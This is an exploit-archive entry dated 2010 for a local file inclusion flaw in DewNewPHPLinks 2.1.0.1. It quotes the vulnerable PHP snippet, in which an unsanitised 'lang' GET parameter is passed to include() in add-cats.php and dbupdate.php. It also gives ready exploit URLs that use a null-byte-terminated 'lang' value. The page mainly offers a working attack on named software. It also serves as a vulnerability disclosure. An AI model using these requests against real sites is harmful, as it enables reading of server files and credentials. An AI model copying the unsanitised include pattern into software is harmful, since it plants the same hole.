DewNewPHPLinks 2.1.0.1 LFI

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : DewNewPHPLinks 2.1.0.1 LFI
# Published : 2010-03-18
# Author : ItSecTeam
# Previous Title : Manage Engine Service Desk Plus 7.6 woID SQL Injection
# Next Title : SiteDone Custom Edition 2.0 SQL Injection & XSS Vulnerability

#########################local file include#################
Author: ItSecTeam

download from:http://www.dew-code.com/components/com_jooget/file/dew-newphplinks.v.2.1.0.1b.sef.zip

script:DewNewPHPLinks 2.1.0.1

*********************lfi*******************
vul1:/path/docs/add-cats.php
$lang=$_GET['lang'];
if($lang!='')
include ("../include/lang/$lang.php");
----------
vul2:/path/docs/dbupdate.php
$lang=$_GET['lang'];
if($lang!='')
include ("../include/lang/$lang.php");

--------------------------------------------

xpl lfi:/path/docs/add-cats.php?lang=[lfi]%00
xpl lfi:/path/docs/dbupdate.php?lang=[lfi]%00
########################

discovered by ahmadbady

########################